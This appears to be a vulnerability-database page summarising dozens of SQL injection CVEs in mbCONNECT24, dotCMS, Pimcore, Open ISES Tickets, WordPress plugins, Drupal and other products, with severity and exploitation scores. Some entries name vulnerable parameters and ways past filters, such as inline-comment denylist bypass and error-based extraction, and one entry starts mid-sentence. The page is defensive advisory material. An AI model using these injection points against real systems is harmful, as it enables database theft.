SQL injection in the UpdateParam function of admin.mbnetj.php in MB connect line's mbCONNECT24, mymbCONNECT24, myREX24V2 and myREX24V2.virtual remote-maintenance portals (versions up to and including 2.20.0) lets a high-privileged remote attacker tamper with a SQL UPDATE command, reading the entire database and modifying values in a non-critical table. The flaw was reported by CERT@VDE (advisory VDE-2026-044) and carries CVSS 4.0 base 7.0. There is no public exploit identified at time of analysis, EPSS is very low (0.03%, 10th percentile), and CISA SSVC rates exploitation as 'none' - indicating low immediate real-world urgency despite the high impact ceiling.

PHP SQLi
NVD
EPSS 0% CVSS 7.0
HIGH This Week

SQL injection in the UpdateParam function of view.html.php affects MB connect line remote-access portals (mbCONNECT24, myREX24V2, mymbCONNECT24, and myREX24V2.virtual) in versions up to and including 2.20.0, letting an attacker inject into a SQL UPDATE statement to read the entire backend database and alter values in a non-critical table. The CVSS 4.0 vector (PR:H) indicates a high-privileged account is required, even though the advisory text labels the flaw 'unauthenticated' - a discrepancy defenders should resolve with the vendor. There is no public exploit identified at time of analysis, EPSS is very low (0.03%), and CISA SSVC rates exploitation as 'none'.

PHP SQLi
NVD
EPSS 0% CVSS 7.0
HIGH This Week

SQL injection in the DeleteSysLogEntry function of MB connect line / Helmholz remote-maintenance platforms - mbCONNECT24, myREX24V2, mymbCONNECT24 and the myREX24V2.virtual variant through version 2.20.0 - lets a network attacker with high privileges inject SQL into a DELETE statement, reading the entire backend database and deleting rows in a non-critical syslog table. The flaw yields full confidentiality loss and limited integrity impact (CVSS 4.0 base 7.0). There is no public exploit identified at time of analysis, EPSS is very low (0.03%, 10th percentile), and CISA SSVC rates exploitation as none, indicating no observed in-the-wild activity. Note the vendor description's 'unauthenticated' wording conflicts with the CVSS PR:H (high privileges required) metric.

SQLi
NVD
EPSS 0% CVSS 7.0
HIGH This Week

SQL injection in the MB connect line remote-maintenance portals mbCONNECT24, myREX24V2, myREX24V2.virtual and mymbCONNECT24 (all versions up to and including 2.20.0) lets a high-privileged remote user manipulate a SQL DELETE statement in the _RemoveRequest function to read the entire backend database and delete rows in a non-critical table. The CVSS 4.0 vector (PR:H) indicates an authenticated, high-privilege account is required despite the description's wording, yielding total confidentiality loss and partial integrity loss. There is no public exploit identified at time of analysis, EPSS is very low (0.03%), and the issue is not listed in CISA KEV.

SQLi
NVD
EPSS 0% CVSS 8.6
HIGH PATCH This Week

Arbitrary file disclosure in Synology Active Backup for Business (DSM add-on package, versions before 2.7.1-3234) lets unauthenticated remote attackers read sensitive files on the host via a SQL injection flaw (CWE-89). The vulnerability scores CVSS 8.6 with a changed scope and high confidentiality impact, but EPSS estimates only a 0.04% (14th percentile) exploitation probability, and there is no public exploit identified at time of analysis nor any CISA KEV listing. Synology, which self-reported the issue, has released a fixed package.

SQLi
NVD
EPSS 0% CVSS 4.9
MEDIUM This Month

Time-based blind SQL Injection in the EnvíaloSimple: Email Marketing y Newsletters WordPress plugin (all versions through 2.4.5) allows authenticated administrators to extract sensitive data from the underlying database. The vulnerability is in the 'orderby' parameter, which is insufficiently escaped and passed into existing SQL queries without adequate preparation, enabling an attacker with administrator-level WordPress credentials to append arbitrary SQL and enumerate database contents. EPSS is very low (0.03%, 8th percentile), no public exploit has been identified, and the vulnerability is not listed in CISA KEV, suggesting limited real-world exploitation pressure at this time.

WordPress SQLi
NVD
EPSS 0% CVSS 6.9
MEDIUM This Month

SQL injection in the dsgvo_contracts view of mbCONNECT24 and related industrial remote access platforms (versions up to and including 2.20.0) enables a high-privileged remote attacker to exfiltrate confidential data from the underlying database without integrity or availability impact. The vulnerability (CWE-89, CVSS 4.0: 6.9) is constrained by the PR:H requirement - the attacker must already hold high-privileged credentials - which substantially limits realistic attack surface in well-managed deployments. No public exploit or active exploitation has been identified; CISA SSVC rates exploitation as none and EPSS stands at 0.03% (10th percentile).

SQLi
NVD
EPSS 0% CVSS 7.0
HIGH This Week

SQL injection in MB connect line's mbCONNECT24 / myREX24V2 remote-maintenance portals (all releases up to and including 2.20.0) lets an attacker break out of the SQL UPDATE statement bound to the 'devices' parameter in the accountstatus view, yielding full read access to the backend database and limited writes to a non-critical table. The CVSS 4.0 vector requires high privileges (PR:H), so a privileged authenticated user is the realistic threat actor — this directly contradicts the advisory text that labels the flaw 'unauthenticated,' a discrepancy defenders should resolve with the vendor. EPSS is very low (0.03%, 10th percentile) and there is no CISA KEV entry; no public exploit identified at time of analysis.

SQLi
NVD
EPSS 0% CVSS 7.0
HIGH This Week

SQL injection in the mbCONNECT24 / myREX24V2 industrial remote-access platform (all editions through 2.20.0) lets a high-privileged remote attacker inject SQL through the userid parameter of the accountstatus view, which is concatenated unsafely into a SQL UPDATE statement. Successful exploitation yields read access to the entire backend database (total confidentiality loss) plus the ability to alter values in a non-critical table (partial integrity loss). There is no public exploit identified at time of analysis, it is not listed in CISA KEV, and the EPSS probability is very low at 0.03% (10th percentile).

SQLi
NVD
EPSS 0% CVSS 7.0
HIGH This Week

SQL injection in the DevSerialReset function of MB connect line / Helmholz industrial remote-access portals (mbCONNECT24, mymbCONNECT24, myREX24V2, and the .virtual variants) lets a high-privileged remote attacker read the entire backend database and modify values in a non-critical table. The flaw stems from improper neutralization of special elements within a SQL UPDATE statement (CWE-89), yielding total loss of confidentiality and partial integrity impact. There is no public exploit identified at time of analysis, and EPSS rates exploitation likelihood very low (0.03%, 10th percentile).

SQLi
NVD
EPSS 0% CVSS 6.9
MEDIUM This Month

SQL injection in the DevSerialReset function of MB Connect Line's mbCONNECT24, myREX24V2, mymbCONNECT24, and myREX24V2.virtual industrial remote access platforms allows a high-privileged remote attacker to read arbitrary database contents via a maliciously crafted SQL SELECT statement. All product variants at or below version 2.20.0 are confirmed affected per ENISA EUVD-2026-32126. No public exploit code exists and EPSS is 0.03% (10th percentile), indicating low observed exploitation pressure at time of analysis; however, the industrial/OT targeting profile warrants attention.

SQLi
NVD
EPSS 0% CVSS 6.9
MEDIUM This Month

SQL injection in the getAccountByID function of MB connect line's mbCONNECT24, mymbCONNECT24, myREX24V2, and myREX24V2.virtual industrial remote-access platforms (all versions up to and including 2.20.0) allows a high-privileged remote attacker to extract data from the underlying database via a crafted SELECT statement. The vulnerability is classified under CWE-89 with confidentiality impact rated High on the vulnerable component, while integrity and availability remain unaffected. No public exploit code exists and no KEV listing has been issued; EPSS (0.03%, 10th percentile) and SSVC signals both indicate low current exploitation likelihood.

SQLi
NVD
EPSS 0% CVSS 8.7
HIGH This Week

Unauthenticated SQL injection in the mbCONNECT24 remote-maintenance platform (and the related myREX24V2, myREX24V2.virtual, and mymbCONNECT24 portals) at version 2.20.0 and earlier lets a remote attacker inject crafted SQL into a SELECT statement processed by the 'sync_data24' task, yielding a total loss of database confidentiality (CVSS 4.0 base 8.7). Because the CVSS vector confirms no privileges and no user interaction (PR:N/UI:N), any network-reachable client can attempt it. There is no public exploit identified at time of analysis, and the EPSS score is very low (0.05%, 15th percentile), so widespread automated exploitation is not currently indicated.

SQLi
NVD
EPSS 0% CVSS 8.7
HIGH This Week

Unauthenticated SQL injection in the mbCONNECT24 remote-maintenance portal (and the related myREX24V2, myREX24V2.virtual and mymbCONNECT24 products, all versions up to and including 2.20.0) lets a remote attacker read arbitrary data from the backend database by abusing the _mb24confi_getDevice function. The flaw requires no credentials, no user interaction and low attack complexity over the network (CVSS 4.0 score 8.7), but its impact is confined to confidentiality. There is no public exploit identified at time of analysis and the EPSS probability is very low (0.05%, 15th percentile), indicating no observed exploitation activity yet.

SQLi
NVD
EPSS 0% CVSS 8.7
HIGH This Week

SQL injection in the mbCONNECT24 / myREX24V2 family of industrial remote-maintenance platforms (all editions at version 2.20.0 and earlier) lets unauthenticated remote attackers manipulate a SQL SELECT statement in the getAlarmProfiles function and read arbitrary database contents. The flaw (CWE-89) carries a CVSS 4.0 base score of 8.7 with a confidentiality-only impact and requires no authentication or user interaction. There is no public exploit identified at time of analysis, and the EPSS probability is very low (0.05%, 15th percentile), indicating no observed mass-exploitation pressure despite the high base score.

SQLi
NVD
EPSS 0% CVSS 8.7
HIGH This Week

SQL injection in MB connect line's mbCONNECT24, mymbCONNECT24, and myREX24V2 remote-maintenance portals (all versions up to and including 2.20.0) lets an unauthenticated remote attacker inject crafted SQL through the _mb24confi_getTagAlarm function in mb24alarm.php, resulting in a total loss of database confidentiality. The CVSS 4.0 base score of 8.7 reflects network reach with no authentication or user interaction (AV:N/AC:L/PR:N/UI:N), but impact is scoped to confidentiality only (VC:H, VI:N, VA:N) - an attacker can read data but cannot directly alter or disrupt the system through this flaw. No public exploit identified at time of analysis, and the EPSS score is very low (0.05%, 15th percentile), indicating no observed broad exploitation activity despite the high base score.

PHP SQLi
NVD
EPSS 0% CVSS 8.7
HIGH This Week

Unauthenticated SQL injection in the mbCONNECT24/myREX24 industrial remote-maintenance platform (all variants up to and including 2.20.0) lets remote attackers extract database contents through the _mb24api_getUserAccount API function via a crafted SQL SELECT command (CWE-89). The CVSS 4.0 score of 8.7 reflects a confidentiality-only impact (VC:H, VI:N, VA:N) reachable over the network with no authentication and no user interaction. No public exploit has been identified at time of analysis and EPSS rates exploitation probability very low (0.05%, 15th percentile), but the no-auth, network-reachable design makes credential and account-data theft a credible concern.

SQLi
NVD
EPSS 0% CVSS 8.7
HIGH This Week

SQL injection in MB connect line's mbCONNECT24 remote-maintenance platform (and the related myREX24V2, mymbCONNECT24 and myREX24V2.virtual products through version 2.20.0) lets unauthenticated remote attackers read arbitrary database contents. The flaw lives in the _mb24confi_getTagAlarm function of dataapi.php, where attacker-controlled input is concatenated into a SQL SELECT statement, yielding a total loss of confidentiality. There is no public exploit identified at time of analysis, the EPSS probability is very low (0.05%), and the issue is not on CISA KEV; it was reported by CERT@VDE (advisory VDE-2026-044).

PHP SQLi
NVD
EPSS 0% CVSS 8.7
HIGH This Week

SQL injection in the mbCONNECT24 / myREX24V2 industrial remote-maintenance platforms (versions up to and including 2.20.0) lets a remote, unauthenticated attacker read arbitrary database contents by manipulating the tagid parameter of the getLiveValues function. The CVSS 4.0 base score is 8.7 with a confidentiality-only impact (VC:H, VI:N, VA:N), and no public exploit has been identified at the time of analysis. EPSS is very low (0.05%, 15th percentile), and the issue is not in CISA KEV, so widespread automated exploitation is not currently indicated despite the network-reachable, no-auth attack surface.

SQLi
NVD
EPSS 0% CVSS 8.7
HIGH This Week

Unauthenticated SQL injection in MB connect line's mbCONNECT24 and myREX24V2 industrial remote-maintenance portals (all editions through 2.20.0) lets remote attackers inject SQL through the 'sn' parameter of the getLiveValues function, producing a total loss of confidentiality. Disclosed via CERT@VDE advisory VDE-2026-044 and tracked as EUVD-2026-32112, the flaw carries a CVSS 4.0 base score of 8.7 and requires no authentication or user interaction, though it has no integrity or availability impact. No public exploit is identified at time of analysis and EPSS rates near-term exploitation probability low at 0.05% (15th percentile).

SQLi
NVD
EPSS 0% CVSS 8.7
HIGH This Week

Unauthenticated SQL injection in the mbCONNECT24 / myREX24V2 industrial remote-maintenance platforms (all variants at versions ≤2.20.0) lets a remote attacker inject crafted input into a SQL SELECT statement handled by the ssoabstractservice (single sign-on) component, yielding read access to backend database contents and a total loss of confidentiality. The flaw requires no authentication, no privileges, and no user interaction over the network. No public exploit has been identified at time of analysis, and the EPSS score is very low (0.05%, 15th percentile), but the issue affects internet-exposed OT remote-access portals, raising its practical exposure.

SQLi
NVD
EPSS 0% CVSS 8.7
HIGH This Week

SQL injection in the MB connect line / Red Lion remote-maintenance platform (mbCONNECT24, mymbCONNECT24, myREX24V2 and myREX24V2.virtual, all versions up to and including 2.20.0) lets a remote, unauthenticated attacker inject crafted SQL into the userinfo endpoint, resulting in total loss of confidentiality of the backing database. The flaw was reported by CERT@VDE (advisory VDE-2026-044) and tracked in the ENISA EUVD as EUVD-2026-32110. There is no public exploit identified at time of analysis and EPSS is very low (0.05%), but the CVSS 4.0 base score is 8.7 and CISA's SSVC framework rates the issue as automatable.

SQLi
NVD
EPSS 0% CVSS 10.0
CRITICAL PATCH Act Now

SQL injection in dotCMS Core (versions 25.11.04-1 through 26.04.28-02) lets remote unauthenticated attackers read, modify, or destroy arbitrary database content through the Publish Audit API endpoints /api/auditPublishing/get and /api/auditPublishing/getAll, which neither enforced authentication nor sanitized input before constructing SQL. The flaw carries a maximum CVSS 4.0 base score of 10.0, reflecting full confidentiality, integrity, and availability impact extending to subsequent systems. No public exploit was identified at time of analysis and EPSS is low (0.38%, 60th percentile), but the network-reachable, no-privilege, no-interaction profile makes this an urgent patch for affected (non-LTS) deployments.

SQLi Dotcms Core
NVD GitHub
CVSS 8.8
HIGH PATCH This Week

SQL injection in Pimcore's admin-ui-classic-bundle (versions <= 2.3.5) allows an authenticated user holding only the translations-view permission to read arbitrary database contents by injecting into the translation grid's date filter. The user-controlled 'property' field of the filter JSON is interpolated directly into a UNIX_TIMESTAMP(DATE(FROM_UNIXTIME(...))) expression at the POST /admin/translation/translations endpoint, behind only a trivially bypassable str_replace('--','') filter. A working proof-of-concept and publicly available exploit code exist; the reporter notes it can be chained with an unsafe-unserialize flaw (GM-249) to reach remote code execution. No EPSS score or CISA KEV listing was supplied.

PHP SQLi Deserialization
NVD GitHub
CVSS 8.7
HIGH PATCH This Week

SQL injection in Pimcore's CustomReportsBundle (versions ≤ 12.3.5) lets an authenticated user holding the reports_config permission inject arbitrary SQL through the custom-report column-config endpoint, which concatenates user-supplied 'sql', 'from', and 'where' fields directly into a query executed via Doctrine's fetchAssociative(). Because the controller returns raw database error messages in its JSON response, attackers can perform error-based extraction (e.g. EXTRACTVALUE) to read credentials and arbitrary tables, and can bypass the keyword denylist using inline /**/ comments to reach UPDATE/INSERT/DELETE - compromising confidentiality and integrity. Publicly available exploit code exists (a full PoC is published in the GitHub advisory); no CISA KEV listing or EPSS score is present in the provided data.

PHP SQLi Google +3
NVD GitHub
EPSS 0% CVSS 2.1
LOW POC Monitor

SQL injection in itsourcecode Courier Management System 1.0 allows low-privileged authenticated remote attackers to manipulate backend database queries via the unsanitized 's' parameter in /parcel_list.php. A proof-of-concept exploit is publicly available on GitHub, meaningfully lowering the barrier to exploitation despite the low CVSS 4.0 score of 2.1. No vendor patch has been identified at time of analysis, leaving deployments reliant on compensating controls.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 5.5
MEDIUM POC This Month

SQL injection in itsourcecode Courier Management System 1.0 lets remote attackers manipulate the 'ID' parameter of /manage_user.php to inject arbitrary SQL into backend database queries. Per the CVSS vector (PR:N) no authentication is required, and publicly available exploit code exists, though the flaw is not listed in CISA KEV and carries only low (C:L/I:L/A:L) per-impact ratings.

PHP SQLi
NVD VulDB
EPSS 0% CVSS 5.5
MEDIUM POC This Month

SQL injection in code-projects Project Management System 1.0 allows remote unauthenticated attackers to manipulate database queries through the login handler (chk.php). The flaw stems from unsanitized input being passed into a SQL statement, enabling authentication-context query tampering and data disclosure. Publicly available exploit code exists, though the vulnerability is not listed in CISA KEV and no active exploitation is confirmed.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 5.5
MEDIUM POC This Month

SQL injection in Online Art Gallery Shop 1.0 allows unauthenticated remote attackers to manipulate database queries through the social_linked parameter in /admin/adminHome.php. The vulnerability has publicly available exploit code and a CVSS score of 7.3, indicating high severity with the ability to impact confidentiality, integrity, and availability of the application.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 5.5
MEDIUM POC This Month

SQL injection in SourceCodester Hospitals Patient Records Management System 1.0 enables remote unauthenticated attackers to manipulate database queries through the ID parameter in /admin/patients/manage_history.php. Public exploit code exists (GitHub), though the issue is not listed in CISA KEV. The vulnerability carries moderate risk, with CVSS 7.3 reflecting the potential for data theft and manipulation of patient records.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 5.5
MEDIUM POC This Month

SQL injection in SourceCodester Hospitals Patient Records Management System 1.0 allows remote attackers to compromise patient data without authentication via a manipulated ID parameter in /classes/Master.php?f=save_patient_history. The vulnerability has publicly available exploit code (GitHub) and enables unauthorized database access with potential to read, modify, or delete patient records. CVSS 7.3 indicates moderate severity with no exploitation prerequisites.

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 2.1
LOW POC Monitor

SQL injection in SourceCodester Hospitals Patient Records Management System 1.0 allows authenticated attackers to extract, modify, or delete database records via the ID parameter in /admin/patients/view_history.php. The vulnerability requires low-privilege authenticated access (PR:L) but has low attack complexity (AC:L) and can be exploited remotely. Publicly available exploit code exists on GitHub (referenced in VulDB entry), enabling immediate weaponization by threat actors. EPSS data not available, and the vulnerability is not currently listed in CISA KEV, indicating exploitation may be limited or targeted rather than widespread. The CVSS 6.3 (Medium) rating reflects partial impact across confidentiality, integrity, and availability (C:L/I:L/A:L).

PHP SQLi
NVD VulDB GitHub
EPSS 0% CVSS 2.1
LOW POC Monitor

SQL injection in QuantumNous new-api versions up to 0.12.1 allows authenticated remote attackers to manipulate database queries through the SearchUserTopUps and SearchAllTopUps functions in the self endpoint. The vulnerability exists in model/topup.go with confirmed public exploit code available on GitHub. With EPSS data unavailable and CVSS 6.3 (medium severity), the primary risk stems from the low-complexity exploitation requiring only low-level authentication, enabling attackers to exfiltrate sensitive data, modify records, or potentially execute denial-of-service attacks against the database layer.

SQLi
NVD VulDB GitHub
EPSS 0% CVSS 8.8
HIGH This Week

Authenticated SQL injection in Best Practical's Request Tracker (RT) ticketing system affects versions 5.0.0-5.0.9 and 6.0.0-6.0.2 via the entry_aggregator parameter in the JSON search endpoint, allowing any logged-in RT user to read or modify arbitrary data in the underlying database. The flaw was disclosed alongside the rt-5.0.10/6.0.3 release on 2026-05-20 and carries CVSS 8.8 due to high impact across confidentiality, integrity, and availability. No public exploit identified at time of analysis, and the vulnerability is not listed in CISA KEV.

SQLi
NVD GitHub
CVSS 9.8
CRITICAL PATCH Act Now

Unauthenticated SQL injection in YesWiki's Bazar form-import path allows any remote visitor to inject arbitrary SQL into an INSERT statement and exfiltrate the entire database, including yeswiki_users.password hashes. Affects YesWiki 4.6.1, 4.6.2, and the doryphore-dev branch prior to 4.6.4. Publicly available exploit code exists (a working Python PoC is published in the GHSA advisory), though the issue is not listed in CISA KEV at time of analysis.

PHP Python Docker +1
NVD GitHub
EPSS 0% CVSS 8.7
HIGH PATCH This Week

SQL injection in STER (Centralny Instytut Ochrony Pracy - Państwowy Instytut Badawczy) versions prior to 9.5 allows authenticated attackers to extract sensitive data by injecting crafted input into multiple Search Filter parameters. The CVSS 4.0 score of 8.7 reflects high confidentiality and integrity impact over the network with low attacker privileges required, and a vendor patch is available in version 9.5. There is no public exploit identified at time of analysis and the CVE is not listed in CISA KEV.

Information Disclosure SQLi
NVD
EPSS 0% CVSS 7.5
HIGH This Week

Unauthenticated SQL injection in the WP ERP Pro WordPress plugin (versions through 1.5.1) allows remote attackers to extract sensitive database contents by manipulating the 'search_key' parameter. The flaw stems from missing input escaping and unprepared SQL statements, enabling UNION-based or appended query attacks against any WordPress site running the affected plugin. No public exploit identified at time of analysis, and the issue is not currently listed in CISA KEV.

WordPress SQLi
NVD
EPSS 0% CVSS 7.1
HIGH PATCH This Week

SQL injection in Open ISES Tickets before 3.44.2 lets authenticated users tamper with backend database queries through the ajax/statistics.php endpoint by injecting payloads into the tick_id and f_tick_id POST parameters. The CVSS 4.0 score of 7.1 reflects high confidentiality impact with lower integrity impact, and while no public exploit is identified at time of analysis, this flaw is one of 19 SQL injection issues bundled into a single critical security release that the vendor urges all users to install immediately.

PHP SQLi
NVD GitHub VulDB
EPSS 0% CVSS 7.1
HIGH PATCH This Week

SQL injection in Open ISES Tickets before 3.44.2 lets authenticated users tamper with the incidents summary report query via the tick_id POST parameter in ajax/reports.php, enabling arbitrary read, modification, or destruction of database contents. The v3.44.2 release notes confirm the fix was part of a broader security overhaul addressing 19 SQL injection flaws and 69 XSS issues. No public exploit identified at time of analysis, and SSVC classifies exploitation status as 'none' with partial technical impact.

PHP SQLi
NVD GitHub
EPSS 0% CVSS 7.1
HIGH PATCH This Week

SQL injection in Open ISES Tickets before 3.44.2 allows authenticated attackers to manipulate database queries via the unsanitized `id` GET parameter in `ajax/mobile_main.php`. The flaw permits arbitrary read, modification, or destruction of database contents, and is part of a broader batch of 19 SQL injection fixes shipped in v3.44.2. No public exploit identified at time of analysis, but the vendor explicitly classifies v3.44.2 as a 'Critical Security Update' urging immediate upgrade.

PHP SQLi
NVD GitHub VulDB
EPSS 0% CVSS 7.1
HIGH PATCH This Week

SQL injection in Open ISES Tickets before 3.44.2 allows authenticated attackers to manipulate backend database queries via the message.php endpoint, enabling unauthorized read, modification, or destruction of database contents. The flaw stems from unsanitized concatenation of the frm_ticket_id and frm_resp_id POST parameters into SELECT and UPDATE statements. No public exploit identified at time of analysis, though VulnCheck has published a dedicated advisory and the vendor's 3.44.2 release bundles fixes for 19 SQL injection issues across the codebase.

PHP SQLi
NVD GitHub VulDB
EPSS 0% CVSS 7.1
HIGH PATCH This Week

SQL injection in Open ISES Tickets before 3.44.2 allows authenticated attackers to manipulate database queries via unsanitized POST parameters (ticketsdb, ticketshost, ticketsuser, ticketspassword) in db_loader.php, enabling read, modification, or destruction of database contents. The vendor confirms this is one of 19 SQL injection flaws patched in v3.44.2, reported by VulnCheck. No public exploit identified at time of analysis, and the vulnerability requires low-privilege authentication (PR:L per CVSS 4.0 vector).

PHP SQLi
NVD GitHub VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

SQL injection in Open ISES Tickets before 3.44.2 allows attackers controlling or impersonating an InstaMapper or Google Latitude GPS tracking endpoint to inject malicious SQL via unsanitized latitude, longitude, callsign, mph, altitude, and timestamp values parsed by incs/remotes.inc.php. The CVSS 4.0 base score of 8.8 reflects unauthenticated network exploitation with high confidentiality impact, and no public exploit is identified at time of analysis. The flaw was disclosed by VulnCheck and is one of 19 SQL injection issues patched in the v3.44.2 release.

PHP SQLi Google
NVD GitHub VulDB
EPSS 0% CVSS 7.1
HIGH PATCH This Week

SQL injection in Open ISES Tickets versions prior to 3.44.2 allows authenticated attackers to manipulate ORDER BY clauses via the sort and dir GET parameters in portal/ajax/list_requests.php, enabling unauthorized read, modification, or destruction of database contents. The CVSS 4.0 score of 7.1 reflects network-reachable exploitation with low privileges and no user interaction required. No public exploit identified at time of analysis, but the vendor's own release notes describe this as part of a critical security update patching 19 SQL injection flaws across 11 files.

PHP SQLi
NVD GitHub
EPSS 0% CVSS 7.1
HIGH PATCH This Week

SQL injection in Open ISES Tickets prior to 3.44.2 allows authenticated attackers to manipulate database queries via the unsanitized 'offset' GET parameter in ajax/sit_incidents.php, which is concatenated directly into a LIMIT clause. Successful exploitation enables reading, modifying, or destroying database contents. No public exploit identified at time of analysis, though the underlying flaw is one of 19 SQL injection issues patched in the same release, indicating broad code-level weakness.

PHP SQLi
NVD GitHub
EPSS 0% CVSS 7.1
HIGH PATCH This Week

SQL injection in Open ISES Tickets versions prior to 3.44.2 allows authenticated attackers to manipulate database queries through the unsanitized offset parameter in ajax/fullsit_incidents.php. The flaw enables reading, modifying, or destroying database contents and is part of a broader v3.44.2 security release that patched 19 SQL injection issues. No public exploit identified at time of analysis, but the vendor classifies the update as critical and urges immediate upgrade.

PHP SQLi
NVD GitHub VulDB
EPSS 0% CVSS 7.1
HIGH PATCH This Week

SQL injection in Open ISES Tickets prior to 3.44.2 lets authenticated users tamper with database contents by abusing unsanitized POST parameters (tablename, indexname, sortby) in tables.php that are concatenated directly into SELECT, UPDATE, and DELETE identifier positions. The flaw is one of 19 SQLi issues fixed in the v3.44.2 release; no public exploit identified at time of analysis, but the vendor labels the release a Critical Security Update and urges immediate upgrade.

PHP SQLi
NVD GitHub VulDB
EPSS 0% CVSS 9.3
CRITICAL Act Now

Blind SQL injection in the WP Directory Kit WordPress plugin (versions up to and including 1.5.0) allows remote unauthenticated attackers to inject SQL commands through improperly neutralized input. With a CVSS 9.3 (scope-changed) rating from Patchstack, successful exploitation can expose sensitive database contents and partially impact availability across the WordPress installation. No public exploit identified at time of analysis and the plugin is not currently listed in CISA KEV.

SQLi
NVD
EPSS 0% CVSS 8.8
HIGH PATCH This Week

SQL injection in Netatalk 3.1.0 through 4.4.2 allows authenticated remote attackers to compromise the MySQL-backed CNID (Catalog Node ID) database used to track AppleTalk/AFP file metadata. The high CVSS 8.8 score (CVSS:3.1/AV:N/AC:L/PR:L/UI:N) reflects network-reachable exploitation with low privileges and high impact to confidentiality, integrity, and availability; no public exploit identified at time of analysis.

SQLi Suse
NVD VulDB
EPSS 0% 4.3 CVSS 6.5
MEDIUM POC KEV PATCH THREAT Act Now

SQL injection in Drupal Core across six major version branches (8.9.0 through 11.3.x) enables remote unauthenticated attackers to manipulate database queries with no required privileges or user interaction, as confirmed by CVSS vector AV:N/AC:L/PR:N/UI:N. The vulnerability yields partial confidentiality and integrity impact per CVSS - enabling data enumeration and limited data manipulation - but does not grant full database control or server compromise. No active exploitation is confirmed (not listed in CISA KEV; SSVC exploitation status: none), but SSVC flags this as automatable, making opportunistic mass scanning against the large global Drupal install base a credible near-term risk.

SQLi
NVD GitHub VulDB
EPSS 0% CVSS 7.6
HIGH This Week

Blind SQL injection in YITH WooCommerce Product Add-Ons (WordPress plugin) through version 4.29.0 allows high-privileged authenticated users to inject malicious SQL into database queries, leading to confidentiality compromise and limited availability impact across a changed security scope. The flaw was disclosed by Patchstack and carries a CVSS 3.1 score of 7.6; no public exploit identified at time of analysis and the issue is not listed in CISA KEV.

WordPress SQLi
NVD
EPSS 0% CVSS 9.3
CRITICAL PATCH Act Now

{id} REST endpoint. The flaw stems from a sanitization bypass in the wp-query-builder component where payloads containing a dot character skip $wpdb->prepare() escaping entirely, enabling UNION-based data exfiltration. No public exploit identified at time of analysis, though Tenable Research has published technical details (TRA-2026-43).

WordPress SQLi
NVD
EPSS 0% CVSS 9.3
CRITICAL PATCH Act Now

Authenticated SQL injection in NextGEN Gallery (WordPress plugin by Awesome Motive/Imagely) before version 4.2.1 allows attackers holding the 'NextGEN Gallery overview' capability - granted to Administrators by default - to inject arbitrary SQL via the 'orderby' parameter on the '/imagely/v1/galleries' and '/imagely/v1/albums' REST endpoints. CVSS 4.0 rates this 9.3 due to high confidentiality, integrity, and scope impact; no public exploit identified at time of analysis, but the issue was reported by Tenable Research (TRA-2026-42) and a vendor patch is available.

SQLi
NVD

Quick Facts

Typical Severity
HIGH
Category
web
Total CVEs
5427
